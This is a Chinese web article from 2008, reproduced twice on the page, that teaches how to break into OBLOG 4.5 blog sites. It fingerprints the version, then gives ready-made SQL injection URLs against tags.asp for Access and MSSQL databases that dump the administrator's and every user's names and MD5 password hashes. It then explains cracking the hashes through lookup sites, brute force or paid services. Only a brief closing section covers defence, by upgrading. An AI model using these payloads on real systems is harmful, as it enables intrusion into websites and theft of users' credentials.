教你一句話讓OBLOG將用戶密碼乖乖送上
互聯(lián)網 發(fā)布時間:2008-10-08 19:01:58 作者:佚名
我要評論

隨著網絡技術的逐步發(fā)展,越來越多的企業(yè)擁有了自己的網站平臺,通過此平臺對外宣傳自己,對內讓員工可以更好的交流技術問題與工作事宜。OBLOG作為一款多用戶博客發(fā)布系統(tǒng)在一定程序上滿足了企業(yè)的上述種種需求,很多企業(yè)通過OBLOG安裝程序搭建簡單的站點交流平臺,然而你
隨著網絡技術的逐步發(fā)展,越來越多的企業(yè)擁有了自己的網站平臺,通過此平臺對外宣傳自己,對內讓員工可以更好的交流技術問題與工作事宜。OBLOG作為一款多用戶博客發(fā)布系統(tǒng)在一定程序上滿足了企業(yè)的上述種種需求,很多企業(yè)通過OBLOG安裝程序搭建簡單的站點交流平臺,然而你是否知道我們只需要一句話就可以讓OBLOG系統(tǒng)將全部用戶密碼乖乖送給入侵者嗎?今天我們就從攻防兩個角度來看看入侵者是如何通過一句話讓OBLOG將用戶密碼乖乖送上的。
一,判斷平臺類型以及系統(tǒng)版本:
在任何一次入侵之前非法入侵者都要針對目標站點,目標系統(tǒng),目標服務器進行必要的信息收集工作,這也是最快的發(fā)現(xiàn)漏洞所在的方法。當我們將一個網站作為攻擊目標時,首先可以通過查看主頁的“源文件”來判斷其使用的站點搭建系統(tǒng)類型,然后在通過對應的命令查看站點搭建系統(tǒng)的版本。下面筆者就從攻擊實例出發(fā)進行介紹。
第一步:我們鎖定了一個內部網站,我們不知道該站點是使用什么類型的程序搭建的,那么我們可以通過在首頁點“查看->源文件”,然后在打開的index頁面源文件中查找相關信息,對于沒有太多豐富經驗的站點管理員來說并不會對全部版本信息進行修改,所以我們可以通過index頁面源文件的開頭或結尾查找到有用的信息。當然如果站點管理員經驗豐富的話,他會把所有蛛絲馬跡的版本泄露字眼都刪除點。
第二步:經過筆者查詢發(fā)現(xiàn)在index頁面結尾處有www.oblog.cn的字樣,看來這個站點系統(tǒng)是由OBLOG程序搭建的。我們也順利完成了系統(tǒng)類型的判斷工作,將入侵主要精力放到了攻擊OBLOG系統(tǒng)上。(如圖1)
圖1
第三步:接下來我們通過IE瀏覽器直接輸入http://ip/ver.asp,對于沒有經驗的網絡管理員來說是不會刪除這些默認的系統(tǒng)版本泄露文件的,從顯示中我們可以看到該OBLOG系統(tǒng)使用的是4.50 final build0619(access)版,版本為4.5,數據庫類型是access數據庫。(如圖2)
圖2
至此我們就順利的完成了目標站點的系統(tǒng)收集工作,了解了該站點是通過OBLOG搭建完成,而且使用的OBLOG安裝程序是4.50 final build0619,使用的數據庫是access。
二,根據程序與版本漏洞進行入侵:
不同版本,不同程序的漏洞不同,入侵方法也不同,對于OBLOG 4.50 final build0619版來說我們可以通過標簽法實現(xiàn)入侵目的,利用SQL注入漏洞讓OBLOG將全部用戶的帳戶名與密碼顯示出來。
第一步:通過http://ip/tags.asp命令顯示出該OBLOG系統(tǒng)的所有標簽信息。(如圖3)
圖3
第二步:我們隨意選擇一個標簽,要求這個標簽里面是有內容的,不能為空。里面內容包括名字,發(fā)布者與發(fā)布時間。當然還有一點特別重要那就是記下這個標簽對應的ID信息,例如筆者選擇該標簽后上方地址處對應的ID地址信息為“tags.asp?tagid=42”。(如圖4)
圖4
第三步:接下來就是通過一句話對OBLOG系統(tǒng)進行SQL注入入侵了,我們在之前記錄的TAGS標簽ID信息基礎上添加注入命令,例如上面看到的ID地址信息為“tags.asp?tagid=42”,那么我們輸入以下內容——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_admin union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
代碼中有兩處是于tagid=42相對應的,這點需要特別留意。當然如果目的站點使用的是MSSQL數據庫而不是本文介紹的ACCESS數據庫的話,相關的SQL注入代碼也要進行改變,具體內容為——http://IP/tags.asp?t=user&keyword=trace&tagid=42 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username+char(124)+password,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder
該命令執(zhí)行后OBLOG將把管理員的帳戶名與密碼顯示出來,我們可以在顯示頁面中看到相關信息,在|前顯示的是帳戶名,后面是密碼,不過密碼都是通過MD5加密過的。(如圖5)
圖5
第四步:除了讓OBLOG顯示管理員相關信息外我們還可以通過以下指令讓OBLOG顯示其所有用戶名與密碼信息,這也是非常危險的。具體注入代碼為——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_user union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
輸入完畢所有在該OBLOG博客平臺上注冊的帳戶與密碼都會顯示出來,同樣密碼是經過MD5加密過的。(如圖6)
圖6
第五步:有了明文帳戶名與MD5加密過的密碼我們基本上可以直接破解出明文密碼,只需要通過一些MD5查詢站點就能夠將MD5密碼順利還原為明文信息。(如圖7)
圖7
第六步:不過并不是所有MD5加密密碼都能夠通過查詢站點反查出明文信息的,如果不成功的話我們只能夠通過MD5暴力破解工具實現(xiàn)了,關于MD5暴力破解工具筆者在以前的文章中進行過詳細的介紹,這里由于篇幅關系就不繼續(xù)說明了,總之暴力破解MD5密文需要的時間是比較長的,一個7位明文密碼對應MD5密碼的破解需要幾天時間。當然一些MD5密碼反查站點也提供了相關有償服務,部分密碼的反查需要我們支付一條一毛錢的費用,如果覺得暴力破解麻煩的讀者可以選擇付費服務快速解決問題。(如圖8)
圖8
三,如何防范:
該漏洞只存在于OBLOG安裝程序是4.6 final版本之前,所以作為OBLOG站點管理員的我們只需要將OBLOG版本進行必要升級,升級到最新版本即可,這樣該注入漏洞就會被順利補掉,我們也完成了安全防范目的。最新的OBLOG升級程序我們可以到www.oblog.cn站點進行下載,相關升級方法與更新彌補漏洞情況也會在升級程序的幫助文檔中詳細說明,感興趣的讀者可以自行研究。
四,總結:
網上很多現(xiàn)成的站點或CMS甚至是BLOG搭建系統(tǒng)都存在著這樣或那樣的漏洞,因此如果企業(yè)使用這些現(xiàn)成程序安裝自身網絡平臺的話就一定要隨時關注升級信息,必要時可以在相關站點注冊會員并記錄自身電子郵件地址,這樣對應程序有升級和新版本發(fā)布時我們就能夠在第一時間收到相關電子郵件獲得升級通知了。另外在搭建網絡平臺時盡量避免access數據庫的出現(xiàn),畢竟access數據庫不太安全,相關程序存在漏洞的可能性比較大。
一,判斷平臺類型以及系統(tǒng)版本:
在任何一次入侵之前非法入侵者都要針對目標站點,目標系統(tǒng),目標服務器進行必要的信息收集工作,這也是最快的發(fā)現(xiàn)漏洞所在的方法。當我們將一個網站作為攻擊目標時,首先可以通過查看主頁的“源文件”來判斷其使用的站點搭建系統(tǒng)類型,然后在通過對應的命令查看站點搭建系統(tǒng)的版本。下面筆者就從攻擊實例出發(fā)進行介紹。
第一步:我們鎖定了一個內部網站,我們不知道該站點是使用什么類型的程序搭建的,那么我們可以通過在首頁點“查看->源文件”,然后在打開的index頁面源文件中查找相關信息,對于沒有太多豐富經驗的站點管理員來說并不會對全部版本信息進行修改,所以我們可以通過index頁面源文件的開頭或結尾查找到有用的信息。當然如果站點管理員經驗豐富的話,他會把所有蛛絲馬跡的版本泄露字眼都刪除點。
第二步:經過筆者查詢發(fā)現(xiàn)在index頁面結尾處有www.oblog.cn的字樣,看來這個站點系統(tǒng)是由OBLOG程序搭建的。我們也順利完成了系統(tǒng)類型的判斷工作,將入侵主要精力放到了攻擊OBLOG系統(tǒng)上。(如圖1)

圖1
第三步:接下來我們通過IE瀏覽器直接輸入http://ip/ver.asp,對于沒有經驗的網絡管理員來說是不會刪除這些默認的系統(tǒng)版本泄露文件的,從顯示中我們可以看到該OBLOG系統(tǒng)使用的是4.50 final build0619(access)版,版本為4.5,數據庫類型是access數據庫。(如圖2)

圖2
至此我們就順利的完成了目標站點的系統(tǒng)收集工作,了解了該站點是通過OBLOG搭建完成,而且使用的OBLOG安裝程序是4.50 final build0619,使用的數據庫是access。
二,根據程序與版本漏洞進行入侵:
不同版本,不同程序的漏洞不同,入侵方法也不同,對于OBLOG 4.50 final build0619版來說我們可以通過標簽法實現(xiàn)入侵目的,利用SQL注入漏洞讓OBLOG將全部用戶的帳戶名與密碼顯示出來。
第一步:通過http://ip/tags.asp命令顯示出該OBLOG系統(tǒng)的所有標簽信息。(如圖3)

圖3
第二步:我們隨意選擇一個標簽,要求這個標簽里面是有內容的,不能為空。里面內容包括名字,發(fā)布者與發(fā)布時間。當然還有一點特別重要那就是記下這個標簽對應的ID信息,例如筆者選擇該標簽后上方地址處對應的ID地址信息為“tags.asp?tagid=42”。(如圖4)

圖4
第三步:接下來就是通過一句話對OBLOG系統(tǒng)進行SQL注入入侵了,我們在之前記錄的TAGS標簽ID信息基礎上添加注入命令,例如上面看到的ID地址信息為“tags.asp?tagid=42”,那么我們輸入以下內容——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_admin union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
代碼中有兩處是于tagid=42相對應的,這點需要特別留意。當然如果目的站點使用的是MSSQL數據庫而不是本文介紹的ACCESS數據庫的話,相關的SQL注入代碼也要進行改變,具體內容為——http://IP/tags.asp?t=user&keyword=trace&tagid=42 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username+char(124)+password,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder
該命令執(zhí)行后OBLOG將把管理員的帳戶名與密碼顯示出來,我們可以在顯示頁面中看到相關信息,在|前顯示的是帳戶名,后面是密碼,不過密碼都是通過MD5加密過的。(如圖5)

圖5
第四步:除了讓OBLOG顯示管理員相關信息外我們還可以通過以下指令讓OBLOG顯示其所有用戶名與密碼信息,這也是非常危險的。具體注入代碼為——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_user union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
輸入完畢所有在該OBLOG博客平臺上注冊的帳戶與密碼都會顯示出來,同樣密碼是經過MD5加密過的。(如圖6)

圖6
第五步:有了明文帳戶名與MD5加密過的密碼我們基本上可以直接破解出明文密碼,只需要通過一些MD5查詢站點就能夠將MD5密碼順利還原為明文信息。(如圖7)

圖7
第六步:不過并不是所有MD5加密密碼都能夠通過查詢站點反查出明文信息的,如果不成功的話我們只能夠通過MD5暴力破解工具實現(xiàn)了,關于MD5暴力破解工具筆者在以前的文章中進行過詳細的介紹,這里由于篇幅關系就不繼續(xù)說明了,總之暴力破解MD5密文需要的時間是比較長的,一個7位明文密碼對應MD5密碼的破解需要幾天時間。當然一些MD5密碼反查站點也提供了相關有償服務,部分密碼的反查需要我們支付一條一毛錢的費用,如果覺得暴力破解麻煩的讀者可以選擇付費服務快速解決問題。(如圖8)

圖8
三,如何防范:
該漏洞只存在于OBLOG安裝程序是4.6 final版本之前,所以作為OBLOG站點管理員的我們只需要將OBLOG版本進行必要升級,升級到最新版本即可,這樣該注入漏洞就會被順利補掉,我們也完成了安全防范目的。最新的OBLOG升級程序我們可以到www.oblog.cn站點進行下載,相關升級方法與更新彌補漏洞情況也會在升級程序的幫助文檔中詳細說明,感興趣的讀者可以自行研究。
四,總結:
網上很多現(xiàn)成的站點或CMS甚至是BLOG搭建系統(tǒng)都存在著這樣或那樣的漏洞,因此如果企業(yè)使用這些現(xiàn)成程序安裝自身網絡平臺的話就一定要隨時關注升級信息,必要時可以在相關站點注冊會員并記錄自身電子郵件地址,這樣對應程序有升級和新版本發(fā)布時我們就能夠在第一時間收到相關電子郵件獲得升級通知了。另外在搭建網絡平臺時盡量避免access數據庫的出現(xiàn),畢竟access數據庫不太安全,相關程序存在漏洞的可能性比較大。
相關文章
- “CMOS密碼”就是通常所說的“開機密碼”,主要是為了防止別人使用自已的計算機,設置的一個屏障2023-08-01
QQScreenShot之逆向并提取QQ截圖--OCR和其他功能
上一篇文章逆向并提取QQ截圖沒有提取OCR功能, 再次逆向我發(fā)現(xiàn)是可以本地調用QQ的OCR的,但翻譯按鈕確實沒啥用, 于是Patch了翻譯按鈕事件, 改為了將截圖用百度以圖搜圖搜索.2023-02-04- QQ截圖是我用過的最好用的截圖工具, 由于基本不在電腦上登QQ了, 于是就想將其提取出獨立版目前除了屏幕錄制功能其他都逆出來了, 在此分享一下2023-02-04
非系統(tǒng)分區(qū)使用BitLocker加密導致軟件無法安裝的解決方法
很多電腦用戶在考慮自己電腦磁盤分區(qū)安全時會采用 Windows 自帶的 BitLocker 加密工具對電腦磁盤分區(qū)進行加密。但有些人加密后就會忘記自己設置的密碼從而導致在安裝其它軟2020-11-25防止離職員工帶走客戶、防止內部員工泄密、避免華為員工泄密事件的發(fā)生
這篇文章為大家詳細介紹了如何才能防止離職員工帶走客戶、防止內部員工泄密、避免華為員工泄密事件的發(fā)生,具有一定的參考價值,感興趣的小伙伴們可以參考一下2017-06-27徹底防止計算機泄密、重要涉密人員離職泄密、涉密人員離崗離職前防范舉
近些年企業(yè)商業(yè)機密泄漏的事件屢有發(fā)生,這篇文章主要教大家如何徹底防止計算機泄密、重要涉密人員離職泄密、告訴大家涉密人員離崗離職前的防范舉措,具有一定的參考價值,2017-06-27- 最近有電腦用戶反應量子計算機可以破解下載的所有的加密算法嗎?其實也不是不可以,下面虛擬就為大家講解買臺量子計算機,如何分分鐘破解加密算法2016-09-26
怎么破解Webshell密碼 Burpsuite破解Webshell密碼圖文教程
webshell是以asp、php、jsp或者cgi等網頁文件形式存在的一種命令執(zhí)行環(huán)境,一種網頁后門。黑客通常會通過它控制別人網絡服務器,那么怎么破解webshell密碼呢?一起來看看吧2016-09-19- 本文討論了針對Linux系統(tǒng)全盤加密的冷啟動攻擊,大家都認為這種攻擊是可行的,但執(zhí)行這么一次攻擊有多難?攻擊的可行性有多少呢?需要的朋友可以參考下2015-12-28
防止泄露公司機密、企業(yè)數據防泄密軟件排名、電腦文件加密軟件排行
面對日漸嚴重的內部泄密事件,我們如何守護企業(yè)的核心信息,如何防止內部泄密也就成了擺在各個企業(yè)領導面前的一大問題。其實,針對內網安全,防止內部信息泄漏早已有了比較2015-12-17